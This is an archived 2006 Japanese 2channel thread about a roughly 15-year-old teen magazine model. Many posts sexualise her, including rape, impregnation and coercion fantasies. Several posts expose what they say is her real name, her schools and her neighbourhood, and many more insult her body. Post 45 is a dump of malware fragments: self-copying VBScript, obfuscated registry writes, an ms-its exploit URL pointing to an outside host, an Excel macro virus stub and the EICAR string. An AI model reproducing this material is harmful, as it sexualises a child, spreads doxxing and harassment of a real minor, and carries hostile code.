5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【STモデル】 星川玲奈 ちゃん Part2

1 : ◆REINAsNNnI :2006/09/09(土) 04:47:03 ID:???
プロフィール:
生年月日 1991年6月30日(日) 身長161cm 76-59-87
第9回国民的美少女コンテスト 審査員特別賞受賞

前スレ:
星川玲奈 ちゃん
http://life7.2ch.net/test/read.cgi/model/1123878360/

2 :無名モデル:2006/09/09(土) 07:30:42 ID:???
2ゲト!
漏れは星川嫌い

3 :無名モデル:2006/09/09(土) 13:46:39 ID:???
                 __,,,,、 .,、
            /'゙´,_/'″  . `\
          : ./   i./ ,,..、    ヽ
         . /    /. l, ,!     `,
           .|  .,..‐.、│          .|
           (´゛ ,/ llヽ            |
            ヽ -./ ., lliヽ       .|
             /'",i" ゙;、 l'ii,''く     .ヽ
         / ...│  ゙l,  l゙゙t, ''ii_    :.!
        : /.._ /    ヽ \\.`゙~''''''"./
        .|-゙ノ/   : ゝ .、 ` .`''←┬゛
          l゙ /.r   ゛ .゙ヒ, .ヽ,   ゙̄|
       . | ./ l      ”'、 .゙ゝ........ん
       l  /     ヽ .`' `、、  .,i゛
       .l|  !    ''''v,    ゙''ー .l、
       |l゙ .il、  .l  .ヽ  .¬---イ
      .ll゙, ./    !            ,!        
      .!!...!!   ,,゙''''ー       .|
      l.",!    .リ         |
      l":|    .〜'''      ,. │
      l; :!    .|'"    ...ノ,゙./ │
      l: l「    !    . ゙゙̄ /  !
      .| .|    !     ,i│  |
      :! .l.    }    ,i'./    |
      :! .|    :|    . /     .|
      :! |    ;!   "      .|
      :! !    │        │
      :!:|               ,! i ,!
      :! ,    .l,      / .l゙ !
      :! |    , l.     | .|  :,

4 :無名モデル:2006/09/09(土) 14:43:41 ID:IQW0g9D2
なんで「友達0」じゃないの?

5 :無名モデル:2006/09/13(水) 14:40:07 ID:3ZsYZ/OY
糞固定がゴリ押しでスレ立てたから

6 :無名モデル:2006/09/13(水) 14:55:27 ID:zmIUSpef
誰かスレ立てなおして

7 :無名モデル:2006/09/13(水) 16:13:47 ID:???
だって友達いるし

8 :無名モデル:2006/09/13(水) 16:55:49 ID:???
じゃあ

【自慢】星川玲奈【うざい】

で誰かよろしく

9 :無名モデル:2006/09/13(水) 20:21:26 ID:???
友達がいないのは可愛いからだよ

10 :無名モデル:2006/09/15(金) 00:18:02 ID:OwR7K/+g
普通に友達いるよ

11 :無名モデル:2006/09/15(金) 08:39:19 ID:???
友達がいても、いなくても
可愛ければ全て許されるんだよ

12 :無名モデル:2006/09/15(金) 09:22:40 ID:gJxxDhtK
友達が少しくらいいても
ブサで性格悪いから許されないんだろ

13 :無名モデル:2006/09/15(金) 17:32:16 ID:???
同じ学校だけど、普通に可愛いw
友達も、大人しい系(玲奈ちゃんもうるさくはない)だけど普通にいると思うbb

14 :無名モデル:2006/09/16(土) 11:46:16 ID:???
かわいい(*´д`*)

15 :無名モデル:2006/09/16(土) 22:45:16 ID:rFnLecB8
れいなちゃんの肛門をペロペロしたい

16 :無名モデル:2006/09/16(土) 23:28:24 ID:???
玲奈ちゃんは素直すぎるくらい素直なんだと思う。
それが裏目に出ちゃう時も多いけど、人として私は好きかな。

17 :無名モデル:2006/09/17(日) 14:05:13 ID:???
なンだこのスレ名??
話と違うぞ 笑

自慢しすぎなんだよ
英語とか…
今時中三で英検持ってるのは普通だろ(笑)

18 :無名モデル:2006/09/18(月) 06:49:01 ID:???
>>15
同意

19 :無名モデル:2006/09/18(月) 23:46:57 ID:???
れいなちゃんて、なんか臭そうだよね 口とかマンコとか。でも、そこが彼女の魅力でもあると思うんだ

20 :無名モデル:2006/09/20(水) 13:34:12 ID:???
センスの悪いあんたが雑誌の編集者になりたい?!
…笑わせんなw

21 :無名モデル:2006/09/20(水) 17:39:01 ID:???
玲奈ちゃんの体臭や口臭は激しく匂うほど興奮するはずだよ

22 :無名モデル:2006/09/21(木) 00:10:14 ID:???
編集とかはうまそうな気がw
でも,お洒落な雑誌とかより子育て雑誌の編集の方が向いてそう。

23 :無名モデル:2006/09/21(木) 05:35:52 ID:???
>>19
>れいなちゃんて、なんか臭そうだよね 

なんでだよ?w

24 :無名モデル:2006/09/21(木) 08:03:42 ID:???
皆レイナちゃんのことが気になるんだな
文句言いながら
結局STのブログ見てるし


25 :無名モデル:2006/09/21(木) 10:41:29 ID:mfSV4ibe
みんな辞めてほしいと思ってるから、苦情のメール送るためにブログ見てるんだよ☆

26 :無名モデル:2006/09/21(木) 14:48:30 ID:???
うん 嫌いではなかったけど私服もセンスなさすぎだし今回のセブンティーン見て呆れた…モデルはダメだねー早く辞めてまた学習院大学でも受験しな

27 :無名モデル:2006/09/21(木) 17:44:54 ID:EnuASwq9
サングラス掛けてるのは自分は一応芸能人だから、と言う意識があるんだろうな

28 :無名モデル:2006/09/21(木) 17:46:48 ID:???
自意識過剰w

29 :無名モデル:2006/09/22(金) 20:31:18 ID:???
修学旅行先正体がバレて凄く騒がれたことを踏まえると、当たり前の行為な気が。

30 :無名モデル:2006/09/23(土) 01:49:11 ID:nroGOGp1
ソースは?

31 :無名モデル:2006/09/23(土) 20:14:41 ID:???
誰も知らないから正体バレても騒ぎにもならない
気にしているのは本人だけ
そんなことを心配する玲奈ちゃんが可愛い

32 :無名モデル:2006/09/24(日) 06:16:53 ID:sN3xcQCN
星川より痛い奴

http://pr4.cgiboy.com/S/6538646/

33 :無名モデル:2006/09/28(木) 21:57:11 ID:nZd5XBpw
たしかに痛かった

34 :無名モデル:2006/09/29(金) 19:08:56 ID:???
↑痛すぎだろ 笑
修学旅行先で、バレたみたいよ。
大変だったのは同じ班だったクラスメイトみたいだけどw
私は同じ班じゃなかったけど、聞いた話では結構騒がれたとか。

35 :無名モデル:2006/09/30(土) 07:27:38 ID:???
はいはい、有名芸能人は辛いねw「バレたらどうしよー」とか、騒いでるの本人だけだからw

36 :無名モデル:2006/10/01(日) 23:03:40 ID:???
れいなちゃんは臭い

37 :無名モデル:2006/10/02(月) 08:49:00 ID:???
星川玲奈嫌い。

でも、レイプしてみたい。

あの優等生ぶった顔が苦痛に歪むのが見たい。

38 :無名モデル:2006/10/04(水) 19:13:39 ID:???
家が相当な金持ちな事は確かだと思う。

39 :無名モデル:2006/10/07(土) 08:31:23 ID:???
れいなちゃんオナニーしてるな。絶対に
あと、ハナクソも舐めてるし

40 :無名モデル:2006/10/07(土) 22:13:56 ID:GuauILEa
この人まゆげおかしい
磨けば相当かわいくなると思うんだけどなぁ…

41 :無名モデル:2006/10/17(火) 16:55:55 ID:???
星川とかマジキモいし
かわいいとか言ってるやつ視覚障害なんじゃねーの?
足太いし。。。
好きなブランドがユニクロとか終わってるよね
めっちゃ男好きだしな

42 :無名モデル:2006/10/17(火) 18:23:20 ID:4Zq6c5oF
本名 源川???皆川 玲奈
前通ってた学校 学習院中学校
年齢は15歳
学年は中03
自意識過剰の嫌われ者

43 :無名モデル:2006/10/18(水) 20:18:32 ID:xcnM8w1i
ひがみ?

44 :無名モデル:2006/10/18(水) 22:19:08 ID:???
>>43
ちがうょ
ねたみ じゃない?

45 :<body onload=window()>:2006/10/19(木) 00:20:37 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


46 :無名モデル:2006/10/19(木) 02:43:51 ID:pqGtCggm
本人が発狂して連投してるから晒しage

47 :無名モデル:2006/10/20(金) 21:30:55 ID:iuumz2bY
星川れいなキモくない???

48 :無名モデル:2006/10/20(金) 21:54:41 ID:???
いや普通にキモいです
あんなにミニスカが似合わん女も珍しいし

多分星川とヤりたい人は頼めばヤってくれるよ
あいつ誰にでも股開くから

49 :無名モデル:2006/10/20(金) 21:58:47 ID:iuumz2bY
森昌子に似てない?

50 :無名モデル:2006/10/20(金) 22:22:22 ID:???
森??
玲奈ちゃん顔はかわいいけどモデル体型ではないよね

51 :無名モデル:2006/10/20(金) 22:26:06 ID:iuumz2bY
体型はヤバイよね。。。てかちょっとSTで浮いてるカンジしない???

52 :無名モデル:2006/10/21(土) 01:48:54 ID:9fvLZsYj
顔も不細工だしスタイルもビミョー。。。
眉毛とかかなりヘン

53 :無名モデル:2006/10/21(土) 18:02:02 ID:6AXhLqTL
眉毛太すぎ!!超〜デブ

54 :無名モデル:2006/10/21(土) 23:17:22 ID:dh6x9vqX
田園調布に住んで学習院に通ってるんだから相当な金持ちな事は確かだと思う

55 :無名モデル:2006/10/21(土) 23:59:22 ID:???
オスカーだからブスで当然w
頭いいの強調しすぎ
頭より服のセンスなんとかして欲しい

56 :無名モデル:2006/10/22(日) 01:13:24 ID:???
オスカーならガチバカに出てた高部あいちゃんが一番がわいい。

57 :無名モデル:2006/10/22(日) 12:00:48 ID:w7Up2d61
なんかどらまでてた

58 :無名モデル:2006/10/22(日) 13:03:59 ID:???
この人さー、友達いても地味な奴ばっかだから
写真出したくないんじゃない?そういう計算しそう。
だって頭いいらしいしwww

59 :無名モデル:2006/10/22(日) 14:57:46 ID:98sgGAB5
オスカーなの??・・・ありえない

60 :無名モデル:2006/10/23(月) 20:15:55 ID:???
玲奈ちゃんの友達はそこらへんの子より可愛い。
根からのお嬢様タイプ。大人しめ。
STモデルみたいな感じではないから出さないのかも。

61 :無名モデル:2006/10/24(火) 12:14:58 ID:???
今まで出たプリ全部ピンだね
友達いねぇらw

62 :無名モデル:2006/10/24(火) 13:00:23 ID:???
芸名??自分の漢字間違えてるし

63 :無名モデル:2006/10/24(火) 17:53:28 ID:???
玲奈ちゃんはお嬢様だよ
お前らの様な庶民とは違い高貴だよ

64 :無名モデル:2006/10/24(火) 19:25:13 ID:wVFgTpf+
友達いなそう
可哀想..
脚ムチムチしてる!!

65 :無名モデル:2006/10/29(日) 19:43:06 ID:???
白くてプルプルしてる

66 :無名モデル:2006/11/04(土) 09:46:28 ID:RJR88fu2
そこがいいんじゃん

67 :無名モデル:2006/11/05(日) 20:47:41 ID:???
ムチムチプルプル

68 :無名モデル:2006/11/06(月) 22:50:17 ID:lcGDnQHJ
胸のサイズはどれくらいなんだろ…

やっぱり貧乳かな?

69 :無名モデル:2006/11/08(水) 13:00:59 ID:???
サイズより乳頭の色が気になるな

70 :無名モデル:2006/11/08(水) 16:15:27 ID:6b962m5s
かなり貧乳

71 :無名モデル:2006/11/10(金) 01:56:59 ID:???
これに出てるみたい
ttp://www.street-f.net/diary/index_diary.html
サッカー見るためにテレビつけたらやってた
突然目に飛び込んできたから一瞬我が目を疑った

72 :無名モデル:2006/11/10(金) 02:00:20 ID:???
ttp://www.street-f.net/artist/yass/hoshikawa.html
こっちか

73 :無名モデル:2006/11/10(金) 02:13:00 ID:???
可愛いと思ったけど、顔は真ん丸でちょっと太り気味かな?
モデルと言うよりアイドルって感じですね。 服装のセンスも相変わらずアレだしw

高校受験は辞めたのかな? 今のうちに勉強してしかるべきトコに入っておいたほうが
後々ラクなんですけどね〜。 

74 :無名モデル:2006/11/11(土) 23:46:00 ID:???
特技:水泳(古式泳法)


75 :無名モデル:2006/11/12(日) 19:40:27 ID:???
よく指揮者が出来たな
学校で友達いないのに

76 :みじんこ:2006/11/15(水) 21:58:53 ID:38R/rtIC
最新STに出てないよね。ww

77 :無名モデル:2006/11/15(水) 23:32:31 ID:???
受験生だもんね!
いいとこ 狙っていると思うよ〜。

78 :無名モデル:2006/11/17(金) 10:51:28 ID:9hGKUxQ+
貧弱な乳に萌える

79 :無名モデル:2006/11/17(金) 23:42:51 ID:???
レナかわいいよレナ

80 :無名モデル:2006/11/17(金) 23:59:40 ID:???
レイナね

81 :無名モデル:2006/11/18(土) 07:13:51 ID:???
レナかわいいよレナ

82 :無名モデル:2006/11/18(土) 13:33:07 ID:uMUVr/a9
レイナ

83 :無名モデル:2006/11/18(土) 18:19:05 ID:???
またブログで自慢?w
すごいけどいちいち載せないで

84 :無名モデル:2006/11/18(土) 18:48:59 ID:???
レーナかわいいよレーナ

85 :無名モデル:2006/11/18(土) 19:18:02 ID:???
>>83
いちいち見ていちいち書き込むな

86 :無名モデル:2006/11/18(土) 19:25:34 ID:???
× レナ
× レーナ
〇 レイナ

87 :無名モデル:2006/11/18(土) 21:50:47 ID:???
>>86
そーなんだ、はじめて知ったありがd
んじゃあらためて

レエナかわいいよレエナ

88 :無名モデル:2006/11/18(土) 22:01:54 ID:uMUVr/a9
同級生=友達 なのかな?


89 :無名モデル:2006/11/18(土) 23:41:01 ID:+o9zi8rE
>>83
一般人よりスタイル悪いモデルって・・・・・

90 :無名モデル:2006/11/19(日) 00:59:18 ID:HY4V7udH
>>89
わたしも思った!
隣の子の方が顔小さい…

91 :無名モデル:2006/11/19(日) 01:18:27 ID:ouhUXZLt
>>89
>>90

禿同

92 :無名モデル:2006/11/19(日) 09:09:08 ID:???
なんかアンチばっかでつまんねー
じゃあ今日も

レナかわいいよレナ

93 :無名モデル:2006/11/19(日) 11:29:29 ID:???
本名 レナだよ!

94 :無名モデル:2006/11/19(日) 13:39:23 ID:ouhUXZLt
いや、玲奈だから

95 :無名モデル:2006/11/19(日) 13:47:47 ID:nWVREOUb
脚かなり太いけど体重何キロくらいなの?

96 :無名モデル:2006/11/19(日) 13:48:16 ID:???
バレたか〜…

97 :無名モデル:2006/11/19(日) 15:02:14 ID:???
>>89
女というのは「何としても孕ましてやりたい!」と思う対象なのだ。 
ガリなどは論外なのだ。 玲奈ちゃんはプリプリで孕ましがいのある体をしているの〜。

98 :無名モデル:2006/11/19(日) 18:33:40 ID:ouhUXZLt
>>97
あくまでも個人の好み

99 :無名モデル:2006/11/19(日) 18:52:55 ID:???
玲奈チャンみたいに肌白でムチムチして頭のいい娘はその場で孕ましてやりたいと
思うね。 これ本能。

100 :無名モデル:2006/11/19(日) 19:33:05 ID:???
玲奈チャン、孕ませてあげたい・・・

101 :無名モデル:2006/11/19(日) 21:32:54 ID:???
玲奈チャンって真っ白スベスベでぷりぷりのお尻だね。 想像するだけで頭がくらくらします。

102 :無名モデル:2006/11/19(日) 23:59:30 ID:ouhUXZLt
変態め

103 :無名モデル:2006/11/20(月) 00:06:16 ID:???
国美の時の玲奈ちゃんは愛らしい美少女だったけど、今の玲奈ちゃんは
オトナの女。 あの真っ白のぷりぷりの体を貫いて孕ませてあげたい。 
きっと白桃のようなきれいなお尻をしているのでしょう。 

104 :無名モデル:2006/11/20(月) 07:06:43 ID:???
玲奈ちゃんに中出した、という妄想でオナニーした
いってきま〜す!玲奈ちゃん

105 :無名モデル:2006/11/20(月) 08:45:56 ID:???
「夏休みに書いた宿題の税金に関する作文が な・ん・と玉川税務署長賞に選ばれました。」

レイナちゃん、どうせネットで検索して丸写ししたんだろ?
ダメだよ、他人の文章をコピーしちゃw 自分の言葉で書かなきゃ 
おしおきするよ オマンコ見せてよ

106 :無名モデル:2006/11/20(月) 10:09:46 ID:???
アンチいなくなったら今度はエロばっかりかよ、つまんねー
てことで今日も

レナ子かわいいよレナ子

107 :無名モデル:2006/11/20(月) 14:02:29 ID:???
本名
レナ子だよ!

108 :無名モデル:2006/11/20(月) 15:18:40 ID:r1CCTsT9
馬鹿しかいないスレだなw

109 :無名モデル:2006/11/20(月) 22:27:34 ID:???
玲奈チャンの第一希望の学校(大学)の学生がavに出演していたって今大騒ぎですね。
玲奈ちゃんもセーフセ○クルを心がけて欲しいと思います。 嗚呼、玲奈ちゃんに
埋め込みたい。

110 :無名モデル:2006/11/20(月) 22:38:40 ID:???
第一志望って慶応?

111 :無名モデル:2006/11/20(月) 23:33:30 ID:r1CCTsT9
慶応じゃないでしょ

112 :無名モデル:2006/11/20(月) 23:46:49 ID:???
上智 ?
また 学習院 ?
気になる…

113 :無名モデル:2006/11/20(月) 23:48:36 ID:???
koでしょ。

114 :無名モデル:2006/11/20(月) 23:56:05 ID:???
中学受験で koダメだったから 絶対いきたいんだな
頑張れ♪

115 :無名モデル:2006/11/21(火) 01:13:13 ID:???
玲奈ちゃんと一つになりたい・・・

116 :無名モデル:2006/11/21(火) 04:31:17 ID:???
慶応なんだー
確かに頭よさそうだし、事実いいみたいだけどさすがに慶応女子は厳しい気が
大学からならいけんじゃん?

117 :無名モデル:2006/11/21(火) 04:45:44 ID:2AqXDixF
高校は日比谷

118 :無名モデル:2006/11/21(火) 04:56:47 ID:???
すごいね!
ほかのモデルと違う!
通信とか ないわ。

119 :無名モデル:2006/11/21(火) 05:52:50 ID:???
日比谷もきわどいんじゃね?
芸能活動してるし

120 :無名モデル:2006/11/21(火) 06:06:41 ID:???
ってか玲奈ちゃんって上品だよね
モデルとしては微妙だけどその辺の中高生なんかより清楚でいいし
やっぱお嬢様っぽい

121 :無名モデル:2006/11/21(火) 07:16:38 ID:???
玲奈チャンは アンチがすごくて いろいろ言われたけど 慶應や日比谷に行けば 憧れる人増えるネッ♪
でも 日比谷ならまた大学受験の時に大変だから 今一気に頑張って 慶應ねらえww

122 :無名モデル:2006/11/21(火) 12:31:17 ID:2AqXDixF
>>120
禿同

多分都立は日比谷を受けるはず。
慶女は流石に高すぎorz
てか日比谷でも際どいかも
もしかしたらランク下げて青山とかかもな

123 :無名モデル:2006/11/21(火) 20:12:45 ID:???
玲奈ちゃんってお勉強していそうで、あんま出来ないんですね。 私がつきっきりで
数学、英語と実技つきの性教育はしっかり教えられるのにまことに遺憾、残念です。

世間の人は学校名で学生を判断しますし、がんばって欲しいと思います。

124 :無名モデル:2006/11/24(金) 00:06:17 ID:???
別に中卒でも良くね?
芸能活動続けたいから私立やめたんだろーし
んなことよりイベントとかやんねーの?
レナイベントやってよレナ

125 :無名モデル:2006/11/24(金) 07:13:17 ID:???
坦坦麺って食ったあと必ず肛門痛くなるよな


126 :無名モデル:2006/11/27(月) 03:59:54 ID:???
レイナの白いケツに大量の体液ぶっかけたい

127 :無名モデル:2006/12/01(金) 13:44:26 ID:???
これの女の子が似てる
http://www.youtube.com/watch?v=rfBggGiTc2A

128 :無名モデル:2006/12/02(土) 09:46:18 ID:???
れーなちゃん
れーなちゃん
れーなちゃん

ペロペロペロ

129 :無名モデル:2006/12/03(日) 12:16:37 ID:Wk+NBR9l
すきなブランドユニクロw

130 :無名モデル:2006/12/03(日) 12:25:57 ID:???
金持ちなのに…

131 :無名モデル:2006/12/03(日) 12:58:13 ID:EwL1b4f1
ウニクロは値段の割りにに生地悪くないからインナーには便利だよ、あと無印も
アウターは買わないけど

132 :無名モデル:2006/12/03(日) 13:44:03 ID:???
星川が金持ちとかw笑い話かよ

133 :無名モデル:2006/12/03(日) 13:46:36 ID:???
お嬢様でしょ
自宅は世田谷に持家だし

134 :無名モデル:2006/12/03(日) 14:07:34 ID:lSlwBxN8
成金でもお嬢様という発想が貧困  玲奈のマンコは下品なにおいがプンプンするぜ

135 :無名モデル:2006/12/03(日) 14:19:41 ID:???
なんだ成金かぁw

136 :無名モデル:2006/12/03(日) 17:26:14 ID:???
今度は知ったかばっかでつまんねー!

レナこいつらつまんねーよレナ

137 :無名モデル:2006/12/05(火) 19:46:15 ID:9pmbsSjz
誰だ!玲奈ちゃんを中傷する輩は!許さないからな

138 :無名モデル:2006/12/11(月) 16:13:30 ID:LAD/+hbT
玲奈のメアド知ってるよ♪
マジですし。つーか小学校が一緒だもん。
筑波大学付属小学校 2部6年 皆川玲奈ってね。

139 :無名モデル:2006/12/13(水) 02:44:09 ID:NhhxrIFV
>>138
そんなの前スレ見てりゃ誰だって知ってるよ
お前地方の妄想デブ男だろ

140 :無名モデル:2006/12/14(木) 16:09:04 ID:???
しかもオッサンだろ

141 :無名モデル:2006/12/15(金) 16:51:52 ID:???
玲奈でオナヌしてるやつ多そうだな。
学習院女子のセーラー服着せたままハメてみてえ!!

142 :無名モデル:2006/12/15(金) 17:48:39 ID:???
昨日のストファイ見たよ、ミニスカ制服姿がエロ可愛かったよ、玲奈ちゃん 早速オナニーしますた


143 :無名モデル:2006/12/15(金) 21:52:39 ID:???
雰囲気がエロいんだよ、優等生で餓鬼っぽいんだけどエロイ
バックから無理やり犯して中田氏したくなる顔

144 :無名モデル:2006/12/16(土) 00:30:13 ID:???
レイナニー?
レナニー?
どっち??

145 :無名モデル:2006/12/16(土) 13:35:39 ID:???
玲奈ちゃんを正座させて往復ビンタしてみたい

146 :無名モデル:2006/12/18(月) 02:07:30 ID:???
>>144
レナニーのほうが語呂がいいな

>>145
そのあとは泣き顔を楽しみながら強制フェラさせて、鼻をつまんでゴックンさせたい。

147 :無名モデル:2006/12/18(月) 19:57:11 ID:???
STモでHな想像はしないでください!

148 :無名モデル:2006/12/18(月) 22:46:43 ID:???
レナニーしよっと♪

149 :無名モデル:2006/12/19(火) 14:53:52 ID:YujB6mNI
あんな誌面構成されて、エロい目で視るなゆーほうがムリだ!

150 :無名モデル:2006/12/19(火) 16:00:40 ID:???
STもエロ雑誌になり下がったか

151 :無名モデル:2006/12/20(水) 09:17:29 ID:???
早く玲奈ちゃんの過激なビキニ写真集が見たい

152 :無名モデル:2006/12/20(水) 10:23:26 ID:???
スタイル超悪いお

153 :無名モデル:2006/12/20(水) 23:30:16 ID:???
>>152
そうですか?
骨格はきれいだし、あのムチ具合がいいのですが・・・

154 :無名モデル:2006/12/21(木) 04:41:23 ID:???
そうだ!あの処女太りとも思える野暮ったさがレナニーへとかきたてるのだ

155 :無名モデル:2006/12/23(土) 08:00:05 ID:itic17vR
Mっ気ありそう

156 :無名モデル:2006/12/23(土) 08:24:32 ID:???
野暮ったい…
この子にぴったりの言葉だ

157 :無名モデル:2006/12/23(土) 08:26:25 ID:???
ナルシだったんだね
ブログにアップ写真を堂々と載せるなんて


158 :無名モデル:2006/12/23(土) 19:21:38 ID:???
玲奈ちゃん
もう我慢できない!

159 :玲奈:2006/12/23(土) 20:49:28 ID:???
我慢して!

160 :無名モデル:2006/12/24(日) 09:07:30 ID:2gMwrv7G
ここはひとつレナニーで我慢

161 :無名モデル:2006/12/24(日) 09:11:27 ID:???
↑おのれはすっこんどれチンカスが。

162 :無名モデル:2006/12/24(日) 12:52:00 ID:???
玲奈ちゃんのパンツかぶって「脱げ!」って脅かしてみたいな

163 :無名モデル:2006/12/25(月) 03:28:29 ID:???
>>157
カワユス

2回もレナニーしちまった

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)